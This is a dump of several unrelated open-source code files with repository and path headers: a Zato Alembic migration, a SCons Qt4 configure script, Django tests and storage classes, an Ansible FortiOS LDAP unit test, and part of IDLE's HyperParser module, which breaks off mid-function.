revision = '0017_7baa0602'
down_revision = '0016_6669bb02'
from alembic import op
import sqlalchemy as sa
# Zato
from zato.common.odb import model
# ################################################################################################################################
def upgrade():
op.drop_column(model.TLSKeyCertSecurity.__tablename__, 'cert_cn')
op.add_column(model.TLSKeyCertSecurity.__tablename__, sa.Column('cert_subject', sa.String(1200), nullable=False))
op.drop_constraint('sec_tls_key_cert_id_fkey', model.TLSKeyCertSecurity.__tablename__)
op.create_foreign_key('sec_tls_key_cert_id_fkey', model.TLSKeyCertSecurity.__tablename__, 'sec_base', ['id'], ['id'])
def downgrade():
op.drop_column(model.TLSKeyCertSecurity.__tablename__, 'cert_subject')
op.add_column(model.TLSKeyCertSecurity.__tablename__, sa.Column('cert_cn', sa.String(1200), nullable=False))
|
nazrulworld/mailbox
|
refs/heads/master
|
run.py
|
12133432
| |
pdellaert/ansible
|
refs/heads/devel
|
hacking/build_library/__init__.py
|
12133432
| |
arun6582/django
|
refs/heads/master
|
tests/null_fk/__init__.py
|
12133432
| |
naterh/ironic
|
refs/heads/master
|
ironic/common/glance_service/v1/__init__.py
|
12133432
| |
LibreGameArchive/silvertree
|
refs/heads/master
|
scons/qt4ng.py
|
1
|
# vi: syntax=python:et:ts=4
from os.path import join, exists
from subprocess import Popen, PIPE
from SCons.Script import *
from SCons.Builder import Builder
from SCons.Action import Action
moc4builder = Builder(
action = Action("$QT4_MOCCOM", "$QT4_MOCCOMSTR"),
prefix = "$QT4_MOCIMPLPREFIX",
suffix = "$QT4_MOCIMPLSUFFIX",
single_source = True
)
uic4builder = Builder(
action = Action("$QT4_UICCOM", "$QT4_UICCOMSTR"),
src_suffix="$QT4_UISUFFIX",
suffix="$QT4_UICDECLSUFFIX",
prefix="$QT4_UICDECLPREFIX",
single_source = True
)
qt4tools = {
"moc" : (moc4builder, """
class class_name : public QObject
{
Q_OBJECT
}
"""),
"uic" : (uic4builder, """
<ui version="4.0" >
<class>Form</class>
<widget class="QWidget" name="Form" >
<property name="geometry" >
<rect>
<x>0</x>
<y>0</y>
<width>400</width>
<height>300</height>
</rect>
</property>
<property name="windowTitle" >
<string>Form</string>
</property>
</widget>
<resources/>
<connections/>
</ui>
""")
}
qt4libs = {
"QtCore" : "QtGlobal",
"QtGui" : "QApplication",
"QtOpenGL" : "QGLWidget",
"Qt3Support" : "",
"QtSql" : "",
"QtNetwork" : "",
"QtSvg" : "",
"QtTest" : "",
"QtXml" : "",
"QtUiTools" : "",
"QtDesigner" : "",
"QtDBUS" : ""
}
def CheckQt4Tools(context, tools = ["moc", "uic"]):
context.Message("Checking for Qt 4 tools %s... " % ", ".join(tools))
env = context.env
env.SetDefault(
QT4_MOCCOM = "$QT4_MOC -o $TARGET $SOURCE",
QT4_MOCIMPLPREFIX = "moc_",
QT4_MOCIMPLSUFFIX = "$CXXFILESUFFIX",
QT4_UICCOM = "$QT4_UIC -o $TARGET $SOURCE",
QT4_UISUFFIX = ".ui",
QT4_UICDECLPREFIX = "ui_",
QT4_UICDECLSUFFIX = ".h"
)
results = []
for tool in tools:
if tool not in qt4tools:
raise KeyError("Unknown tool %s." % tool)
tool_var = "QT4_" + tool.upper()
if env.get("QT4DIR") and not env["use_frameworked_qt"]:
qt_bin_dir = join(env["QT4DIR"], "bin")
else:
qt_bin_dir = "/usr/bin"
if not env.has_key(tool_var):
env[tool_var] = WhereIs(tool + "-qt4", qt_bin_dir) or \
WhereIs(tool + "4", qt_bin_dir) or \
WhereIs(tool, qt_bin_dir)
if not env["use_frameworked_qt"]:
try:
tool_location = Popen(Split("pkg-config --variable=" + tool + "_location QtCore"), stdout = PIPE).communicate()[0]
tool_location = tool_location.rstrip("\n")
if exists(tool_location):
env[tool_var] = tool_location
except OSError:
pass
builder_method_name = tool.capitalize() + "4"
env.Append(BUILDERS = { builder_method_name : qt4tools[tool][0] } )
result = context.TryBuild(eval("env.%s" % builder_method_name), qt4tools[tool][1])
if not result or context.lastTarget.get_contents() == "":
context.Result("no")
return False
context.Result("yes")
return True
def CheckQt4Libs(context, libs = ["QtCore", "QtGui"]):
context.Message("Checking for Qt 4 libraries %s... " % ", ".join(libs))
env = context.env
backup = env.Clone().Dictionary()
if env["PLATFORM"] != "win32" and not env["use_frameworked_qt"]:
for lib in libs:
try:
env.ParseConfig("pkg-config --libs --cflags %s" % lib)
except OSError:
pass
if env["use_frameworked_qt"]:
env.Append(FRAMEWORKPATH = env.get("QT4DIR") or "/Library/Frameworks/")
env.Append(FRAMEWORKS = libs)
if env["PLATFORM"] == "win32":
if not env.has_key("QT4DIR"): raise KeyError("QT4DIR MUST be specified on Windows.")
env.AppendUnique(CPPPATH = [join("$QT4DIR", "include")])
for lib in libs:
if lib == "QtOpenGL":
env.AppendUnique(LIBS=["opengl32"])
env.AppendUnique(
CPPPATH = [join("$QT4DIR", "include", lib)],
LIBS = [lib + "4"],
LIBPATH = [join("$QT4DIR", "lib")]
)
test_program = ""
for lib in libs:
test_program += "#include <%s/%s>\n" % (lib, qt4libs[lib]) or lib
test_program += "int main() {}\n"
if context.TryLink(test_program, ".cpp"):
context.Result("yes")
return True
else:
context.Result("no")
env.Replace(**backup)
return False
def get_checks():
return { "CheckQt4Tools" : CheckQt4Tools, "CheckQt4Libs" : CheckQt4Libs }
|
BassantMorsi/finderApp
|
refs/heads/master
|
lib/python2.7/site-packages/wheel/test/simple.dist/setup.py
|
565
|
from setuptools import setup
try:
unicode
def u8(s):
return s.decode('unicode-escape').encode('utf-8')
except NameError:
def u8(s):
return s.encode('utf-8')
setup(name='simple.dist',
version='0.1',
description=u8('A testing distribution \N{SNOWMAN}'),
packages=['simpledist'],
extras_require={'voting': ['beaglevote']},
)
|
bplancher/odoo
|
refs/heads/9.0
|
addons/l10n_de_skr04/migrations/9.0.2.0/pre-set_tags_and_taxes_updatable.py
|
25
|
from openerp.modules.registry import RegistryManager
def migrate(cr, version):
registry = RegistryManager.get(cr.dbname)
from openerp.addons.account.models.chart_template import migrate_set_tags_and_taxes_updatable
migrate_set_tags_and_taxes_updatable(cr, registry, 'l10n_de_skr04')
|
sam-tsai/django-old
|
refs/heads/master
|
tests/regressiontests/queries/tests.py
|
10
|
import unittest
from django.db import DatabaseError, connections, DEFAULT_DB_ALIAS
from django.db.models import Count
from django.test import TestCase
from models import Tag, Annotation, DumbCategory, Note, ExtraInfo
class QuerysetOrderedTests(unittest.TestCase):
"""
Tests for the Queryset.ordered attribute.
"""
def test_no_default_or_explicit_ordering(self):
self.assertEqual(Annotation.objects.all().ordered, False)
def test_cleared_default_ordering(self):
self.assertEqual(Tag.objects.all().ordered, True)
self.assertEqual(Tag.objects.all().order_by().ordered, False)
def test_explicit_ordering(self):
self.assertEqual(Annotation.objects.all().order_by('id').ordered, True)
def test_order_by_extra(self):
self.assertEqual(Annotation.objects.all().extra(order_by=['id']).ordered, True)
def test_annotated_ordering(self):
qs = Annotation.objects.annotate(num_notes=Count('notes'))
self.assertEqual(qs.ordered, False)
self.assertEqual(qs.order_by('num_notes').ordered, True)
class SubqueryTests(TestCase):
def setUp(self):
DumbCategory.objects.create(id=1)
DumbCategory.objects.create(id=2)
DumbCategory.objects.create(id=3)
def test_ordered_subselect(self):
"Subselects honor any manual ordering"
try:
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])
self.assertEquals(set(query.values_list('id', flat=True)), set([2,3]))
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[:2])
self.assertEquals(set(query.values_list('id', flat=True)), set([2,3]))
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])
self.assertEquals(set(query.values_list('id', flat=True)), set([1]))
except DatabaseError:
# Oracle and MySQL both have problems with sliced subselects.
# This prevents us from even evaluating this test case at all.
# Refs #10099
self.assertFalse(connections[DEFAULT_DB_ALIAS].features.allow_sliced_subqueries)
def test_sliced_delete(self):
"Delete queries can safely contain sliced subqueries"
try:
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:1]).delete()
self.assertEquals(set(DumbCategory.objects.values_list('id', flat=True)), set([1,2]))
except DatabaseError:
# Oracle and MySQL both have problems with sliced subselects.
# This prevents us from even evaluating this test case at all.
# Refs #10099
self.assertFalse(connections[DEFAULT_DB_ALIAS].features.allow_sliced_subqueries)
class CloneTests(TestCase):
def test_evaluated_queryset_as_argument(self):
"#13227 -- If a queryset is already evaluated, it can still be used as a query arg"
n = Note(note='Test1', misc='misc')
n.save()
e = ExtraInfo(info='good', note=n)
e.save()
n_list = Note.objects.all()
# Evaluate the Note queryset, populating the query cache
list(n_list)
# Use the note queryset in a query, and evaluate
# that query in a way that involves cloning.
try:
self.assertEquals(ExtraInfo.objects.filter(note__in=n_list)[0].info, 'good')
except:
self.fail('Query should be clonable')
|
adedayo/intellij-community
|
refs/heads/master
|
python/testData/refactoring/unwrap/whileInIfUnwrap_after.py
|
80
|
if True:
# comment
x = 1<caret>
y = 2
|
da1z/intellij-community
|
refs/heads/master
|
python/lib/Lib/site-packages/django/contrib/staticfiles/storage.py
|
71
|
import os
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.storage import FileSystemStorage
from django.utils.importlib import import_module
from django.contrib.staticfiles import utils
class StaticFilesStorage(FileSystemStorage):
"""
Standard file system storage for site media files.
The defaults for ``location`` and ``base_url`` are
``STATIC_ROOT`` and ``STATIC_URL``.
"""
def __init__(self, location=None, base_url=None, *args, **kwargs):
if location is None:
location = settings.STATIC_ROOT
if base_url is None:
base_url = settings.STATIC_URL
if not location:
raise ImproperlyConfigured("You're using the staticfiles app "
"without having set the STATIC_ROOT setting. Set it to "
"the absolute path of the directory that holds static media.")
# check for None since we might use a root URL (``/``)
if base_url is None:
raise ImproperlyConfigured("You're using the staticfiles app "
"without having set the STATIC_URL setting. Set it to "
"URL that handles the files served from STATIC_ROOT.")
if settings.DEBUG:
utils.check_settings()
super(StaticFilesStorage, self).__init__(location, base_url, *args, **kwargs)
class AppStaticStorage(FileSystemStorage):
"""
A file system storage backend that takes an app module and works
for the ``static`` directory of it.
"""
source_dir = 'static'
def __init__(self, app, *args, **kwargs):
"""
Returns a static file storage if available in the given app.
"""
# app is actually the models module of the app. Remove the '.models'.
bits = app.__name__.split('.')[:-1]
self.app_name = bits[-1]
self.app_module = '.'.join(bits)
# The models module (app) may be a package in which case
# dirname(app.__file__) would be wrong. Import the actual app
# as opposed to the models module.
app = import_module(self.app_module)
location = self.get_location(os.path.dirname(app.__file__))
super(AppStaticStorage, self).__init__(location, *args, **kwargs)
def get_location(self, app_root):
"""
Given the app root, return the location of the static files of an app,
by default 'static'. We special case the admin app here since it has
its static files in 'media'.
"""
if self.app_module == 'django.contrib.admin':
return os.path.join(app_root, 'media')
return os.path.join(app_root, self.source_dir)
def get_prefix(self):
"""
Return the path name that should be prepended to files for this app.
"""
if self.app_module == 'django.contrib.admin':
return self.app_name
return None
def get_files(self, ignore_patterns=[]):
"""
Return a list containing the relative source paths for all files that
should be copied for an app.
"""
files = []
prefix = self.get_prefix()
for path in utils.get_files(self, ignore_patterns):
if prefix:
path = '/'.join([prefix, path])
files.append(path)
return files
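# A minimal settings sketch (comments only; the paths are illustrative) for
# pointing StaticFilesStorage at a collection directory, matching the checks
# performed in StaticFilesStorage.__init__ above:
#
#     STATIC_ROOT = '/var/www/example/static/'
#     STATIC_URL = '/static/'
#     STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'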
|
hyperized/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_user_ldap.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_ldap
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_ldap.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_ldap_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_ldap_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_ldap_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'ldap', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_ldap_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'ldap', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_ldap_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_ldap_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'random_attribute_not_valid': 'tag',
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
CamelBackNotation/CarnotKE
|
refs/heads/master
|
jyhton/lib-python/2.7/idlelib/HyperParser.py
|
64
|
"""
HyperParser
===========
This module defines the HyperParser class, which provides advanced parsing
abilities for the ParenMatch and other extensions.
The HyperParser uses PyParser. PyParser is intended mostly to give information
on the proper indentation of code. HyperParser gives some information on the
structure of code, used by extensions to help the user.
"""
import string
import keyword
from idlelib import PyParse
class HyperParser:
def __init__(self, editwin, index):
"""Initialize the HyperParser to analyze the surroundings of the given
index.
"""
self.editwin = editwin
self.text = text = editwin.text
parser = PyParse.Parser(editwin.indentwidth, editwin.tabwidth)
def index2line(index):
return int(float(index))
lno = index2line(text.index(index))
if not editwin.context_use_ps1:
for context in editwin.num_context_lines:
startat = max(lno - context, 1)
startatindex = repr(startat) + ".0"
stopatindex = "%d.end" % lno
# We add the newline because PyParse requires a newline at end.
                # We add a space so that index won't be at the end of the line,
                # so that its status will be the same as the char before it.
parser.set_str(text.get(startatindex, stopatindex)+' \n')
bod = parser.find_good_parse_start(
editwin._build_char_in_string_func(startatindex))
if bod is not None or startat == 1:
break
parser.set_lo(bod or 0)
else:
r = text.tag_prevrange("console", index)
if r:
startatindex = r[1]
else:
startatindex = "1.0"
stopatindex = "%d.end" % lno
# We add the newline because PyParse requires a newline at end.
            # We add a space so that index won't be at the end of the line,
            # so that its status will be the same as the char before it.
parser.set_str(text.get(startatindex, stopatindex)+' \n')
parser.set_lo(0)
# We want what the parser has, except for the last newline and space.
self.rawtext = parser.str[:-2]
# As far as I can see, parser.str preserves the statement we are in,
# so that stopatindex can be used to synchronize the string with the
# text box indices.
self.stopatindex = stopatindex
self.bracketing = parser.get_last_stmt_bracketing()
# find which pairs of bracketing are openers. These always correspond
# to a character of rawtext.
self.isopener = [i>0 and self.bracketing[i][1] > self.bracketing[i-1][1]
for i in range(len(self.bracketing))]
self.set_index(index)
def set_index(self, index):
"""Set the index to which the functions relate. Note that it must be
in the same statement.
"""
indexinrawtext = \
len(self.rawtext) - len(self.text.get(index, self.stopatindex))
if indexinrawtext < 0:
raise ValueError("The index given is before the analyzed statement")
self.indexinrawtext = indexinrawtext
# find the rightmost bracket to which index belongs
self.indexbracket = 0
while self.indexbracket < len(self.bracketing)-1 and \
self.bracketing[self.indexbracket+1][0] < self.indexinrawtext:
self.indexbracket += 1
if self.indexbracket < len(self.bracketing)-1 and \
self.bracketing[self.indexbracket+1][0] == self.indexinrawtext and \
not self.isopener[self.indexbracket+1]:
self.indexbracket += 1
def is_in_string(self):
"""Is the index given to the HyperParser is in a string?"""
# The bracket to which we belong should be an opener.
# If it's an opener, it has to have a character.
return self.isopener[self.indexbracket] and \
self.rawtext[self.bracketing[self.indexbracket][0]] in ('"', "'")
def is_in_code(self):
"""Is the index given to the HyperParser is in a normal code?"""
return not self.isopener[self.indexbracket] or \
self.rawtext[self.bracketing[self.indexbracket][0]] not in \
('#', '"', "'")
def get_surrounding_brackets(self, openers='([{', mustclose=False):
"""If the index given to the HyperParser is surrounded by a bracket
defined in openers (or at least has one before it), return the
indices of the opening bracket and the closing bracket (or the
end of line, whichever comes first).
If it is not surrounded by brackets, or the end of line comes before
the closing bracket and mustclose is True, returns None.
"""
bracketinglevel = self.bracketing[self.indexbracket][1]
before = self.indexbracket
while not self.isopener[before] or \
self.rawtext[self.bracketing[before][0]] not in openers or \
self.bracketing[before][1] > bracketinglevel:
before -= 1
if before < 0:
return None
bracketinglevel = min(bracketinglevel, self.bracketing[before][1])
after = self.indexbracket + 1
while after < len(self.bracketing) and \
self.bracketing[after][1] >= bracketinglevel:
after += 1
beforeindex = self.text.index("%s-%dc" %
(self.stopatindex, len(self.rawtext)-self.bracketing[before][0]))
if after >= len(self.bracketing) or \
self.bracketing[after][0] > len(self.rawtext):
if mustclose:
return None
afterindex = self.stopatindex
else:
# We are after a real char, so it is a ')' and we give the index
# before it.
afterindex = self.text.index("%s-%dc" %
(self.stopatindex,
len(self.rawtext)-(self.bracketing[after][0]-1)))
return beforeindex, afterindex
# This string includes all chars that may be in a white space
_whitespace_chars = " \t\n\\"
# This string includes all chars that may be in an identifier
_id_chars = string.ascii_letters + string.digits + "_"
# This string includes all chars that may be the first char of an identifier
_id_first_chars = string.ascii_letters + "_"
# Given a string and pos, return the number of chars in the identifier
# which ends at pos, or 0 if there is no such one. Saved words are not
# identifiers.
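    # A small worked example (values checked by hand, not taken from any docs):
    # with str == "foo.bar", limit == 0 and pos == 7 this returns 3 (the length
    # of the trailing identifier "bar"); with pos == 4, just after the dot, it
    # returns 0.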
def _eat_identifier(self, str, limit, pos):
i = pos
while i > limit and str[i-1] in self._id_chars:
i -= 1
if i < pos and (str[i] not in self._id_first_chars or \
keyword.iskeyword(str[i:pos])):
i = pos
return pos - i
def get_expression(self):
"""Return a string with the Python expression which ends at the given
index, which is empty if there is no real one.
"""
if not self.is_in_code():
raise ValueError("get_expression should only be called if index "\
"is inside a code.")
rawtext = self.rawtext
bracketing = self.bracketing
brck_index = self.indexbracket
brck_limit = bracketing[brck_index][0]
pos = self.indexinrawtext
last_identifier_pos = pos
postdot_phase = True
while 1:
# Eat whitespaces, comments, and if postdot_phase is False - one dot
while 1:
if pos>brck_limit and rawtext[pos-1] in self._whitespace_chars:
# Eat a whitespace
pos -= 1
elif not postdot_phase and \
pos > brck_limit and rawtext[pos-1] == '.':
# Eat a dot
pos -= 1
postdot_phase = True
# The next line will fail if we are *inside* a comment, but we
# shouldn't be.
elif pos == brck_limit and brck_index > 0 and \
rawtext[bracketing[brck_index-1][0]] == '#':
# Eat a comment
brck_index -= 2
brck_limit = bracketing[brck_index][0]
pos = bracketing[brck_index+1][0]
else:
# If we didn't eat anything, quit.
break
if not postdot_phase:
# We didn't find a dot, so the expression end at the last
# identifier pos.
break
ret = self._eat_identifier(rawtext, brck_limit, pos)
if ret:
# There is an identifier to eat
pos = pos - ret
last_identifier_pos = pos
# Now, in order to continue the search, we must find a dot.
postdot_phase = False
# (the loop continues now)
elif pos == brck_limit:
# We are at a bracketing limit. If it is a closing bracket,
# eat the bracket, otherwise, stop the search.
level = bracketing[brck_index][1]
while brck_index > 0 and bracketing[brck_index-1][1] > level:
brck_index -= 1
if bracketing[brck_index][0] == brck_limit:
# We were not at the end of a closing bracket
break
pos = bracketing[brck_index][0]
brck_index -= 1
brck_limit = bracketing[brck_index][0]
last_identifier_pos = pos
if rawtext[pos] in "([":
# [] and () may be used after an identifier, so we
# continue. postdot_phase is True, so we don't allow a dot.
pass
else:
